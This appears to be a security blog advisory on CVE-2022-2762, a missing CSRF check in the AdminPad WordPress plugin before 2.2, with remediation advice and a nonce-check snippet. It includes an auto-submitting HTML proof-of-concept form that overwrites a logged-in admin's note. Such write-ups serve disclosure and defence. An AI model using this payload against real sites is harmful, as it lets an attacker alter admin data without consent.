CVE-2022-2762 - AdminPad WordPress Plugin Prior to 2.2 Vulnerable to CSRF Attacks

In this post, we're diving deep into CVE-2022-2762, a security vulnerability affecting the popular AdminPad WordPress plugin prior to version 2.2. The flaw? A missing Cross-Site Request Forgery (CSRF) validation when updating the admin's notes, which could let an attacker trick an admin into modifying their notes without their knowledge. We'll break down how this vulnerability works, show a proof-of-concept exploit, and give advice on protecting your WordPress sites.

What is CVE-2022-2762?

AdminPad is a WordPress plugin that lets site admins save private notes inside the dashboard. Versions prior to 2.2 fail to properly verify CSRF tokens when updating these notes. Because of this, any website can trick a logged-in admin into updating their notes.

This is dangerous, as malicious actors can plant deceptive or harmful notes directly onto the admin's dashboard, possibly tricking them into dangerous actions later. Note that the attacker can't gain admin access directly, but it's still a real risk.

References

- WPScan Advisory Database: CVE-2022-2762
- NIST National Vulnerability Database: CVE-2022-2762
- OWASP CSRF Cheat Sheet

How the Exploit Works

The lack of a CSRF check means an attacker can craft a simple HTML page that submits a POST request to the vulnerable endpoint, updating the admin note. If the admin (being logged into WordPress) visits the attacker's page, their browser will send the request using existing authentication cookies.

Here is a simple proof-of-concept HTML exploit

<!DOCTYPE html>
<html>
  <body>
    <form id="csrf" action="https://victim-wordpress-site.com/wp-admin/admin-post.php"; method="POST">
      <!-- Update this with the parameter name(s) used by the plugin. Example: -->
      <input type="hidden" name="note" value="Hacked by CSRF! Read this and panic." />
      <input type="hidden" name="action" value="adminpad_update_note" />
      <!-- Add any other required fields as needed by the plugin -->
    </form>
    <script>
      document.getElementById('csrf').submit();
    </script>
  </body>
</html>

Any admin who is currently logged into the vulnerable WordPress site and visits this malicious page will have their admin note updated without their knowledge or consent.

Real-World Risks

- Misinformation: The attacker can write notes that could deceive the admin ("Plugin update failed, don't upgrade!" etc.)

How to Fix

- Upgrade AdminPad: Immediately update to version 2.2 or later. The changelog confirms CSRF checks were added.
- General Best Practice: Always keep WordPress plugins up to date and review admin dashboards for unexpected changes.

Here's an example PHP snippet showing how to check for a WordPress nonce (CSRF token)

if (isset($_POST['note']) && check_admin_referer('update_adminpad_note')) {
    // Safe to update note
    update_option('adminpad_note', sanitize_text_field($_POST['note']));
}

The check_admin_referer() function ensures the request comes from a legitimate source within WordPress.

Conclusion

CVE-2022-2762 is a classic example of why all plugin actions that change data should always verify CSRF tokens. If you're using AdminPad on your WordPress site, check your plugin version now. Update to 2.2 or newer to protect yourself from this simple but dangerous attack vector.

Regularly review admin notes for anything suspicious.

*For further reading, consult the official CVE entry and OWASP's CSRF resources.*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 01:47:00 UTC